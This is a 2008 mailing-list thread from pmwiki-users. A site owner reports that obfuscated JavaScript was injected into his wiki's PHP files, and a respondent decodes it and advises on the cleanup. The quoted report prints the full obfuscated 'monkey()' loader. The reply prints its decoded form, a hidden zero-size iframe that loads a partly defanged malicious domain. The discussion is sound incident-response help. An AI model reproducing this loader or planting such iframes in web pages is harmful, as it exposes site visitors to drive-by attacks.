[pmwiki-users] monkey() function?!?

DaveG pmwiki at solidgone.com
Sun Jan 6 18:29:33 CST 2008 

Certainly looks like the site was compromised. First thing to check is 
the permissions on the file. Also, check logs to see if anyone other 
than you logged in.

Here's what the code would produce:
<Script Language='Javascript'>document.write(unescape('<iframe 
src="http://[remove]I4LLd.dAgOTh.iN[remove]/" width=0 
height=0></iframe>'));</script>

Basically, it creates an iframe on your page and loads it with the url 
(remove the '[remove]' if you're willing to test), which appears to get 
bounced to a number of other domains -- changes each time the url is loaded.

I'd definitely contact the host -- there maybe other sites on the 
machine that were compromised.

  ~ ~ David

Peter & Melodye Bowers wrote:
> I went away on vacation for a week and when I returned I found my wiki 
> site non-functioning and the following code inserted in several key 
> pmwiki php files (pmwiki.php, wikiforms.php, extendedmarkup.php, some of 
> my triad skin php files, etc.):
> 
>  
> 
> </head>\n<body><script language = "javascript">function monkey(s){
> 
> var s1=unescape(s.substr(0,s.length)); var t='';
> 
> for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)+7);
> 
> document.write(unescape(t));
> 
> };
> 
> monkey('%35%4C%5C%6B%62%69%6D%19%45%5A%67%60%6E%5A%60%5E%36%20%43%5A%6F%5A%6C%5C%6B%62%69%6D%20%37%5D%68%5C%6E%66%5E%67%6D%27%70%6B%62%6D%5E%21%6E%67%5E%6C%5C%5A%69%5E%21%20%1E%2C%3C%1E%2F%32%1E%2F%2F%1E%30%2B%1E%2F%2A%1E%2F%3D%1E%2F%2E%1E%2B%29%1E%30%2C%1E%30%2B%1E%2F%2C%1E%2C%3D%1E%2B%2B%1E%2F%31%1E%30%2D%1E%30%2D%1E%30%29%1E%2C%3A%1E%2B%3F%1E%2B%3F%1E%2D%32%1E%2C%2D%1E%2D%3C%1E%2D%3C%1E%2F%2D%1E%2B%3E%1E%2F%2D%1E%2D%2A%1E%2F%30%1E%2D%3F%1E%2E%2D%1E%2F%31%1E%2B%3E%1E%2F%32%1E%2D%3E%1E%2B%3F%1E%2B%2B%1E%2B%29%1E%30%30%1E%2F%32%1E%2F%2D%1E%30%2D%1E%2F%31%1E%2C%3D%1E%2C%29%1E%2B%29%1E%2F%31%1E%2F%2E%1E%2F%32%1E%2F%30%1E%2F%31%1E%30%2D%1E%2C%3D%1E%2C%29%1E%2C%3E%1E%2C%3C%1E%2B%3F%1E%2F%32%1E%2F%2F%1E%30%2B%1E%2F%2A%1E%2F%3D%1E%2F%2E%1E%2C%3E%20%22%22%34%35%28%6C%5C%6B%62%69%6D%37'); 
> </script>";
> 
>  
> 
> My first guess is that my hosting company was infiltrated by some sort 
> of virus that went on the prowl for anything remotely resembling HTML 
> and inserted this code in hopes it would work (it didn’t – it just 
> generated php errors in every case where I found it).  But I just want 
> to check before I start pointing fingers at my host (who generously 
> donates the hosting and so I like to stay on their good side) that 
> there’s not something I might have done thru PHP that would have opened 
> a door to allow someone to make this type of malicious modification…?  
> For instance, webadmin allows users to bypass any kind of FTP security – 
> I’ve kept that password secure [obviously] and now disabled that 
> capability, but I’m just wondering if there’s not something else that a 
> newby to this kind of thing might have done accidentally.  Any tho’ts 
> from you security gurus out there?  Or do I just need to contact my host 
> and let him know he’s been compromised?
> 
>  
> 
> -Peter
> 
> 
> ------------------------------------------------------------------------
> 
> _______________________________________________
> pmwiki-users mailing list
> pmwiki-users at pmichaud.com
> http://www.pmichaud.com/mailman/listinfo/pmwiki-users

More information about the pmwiki-users mailing list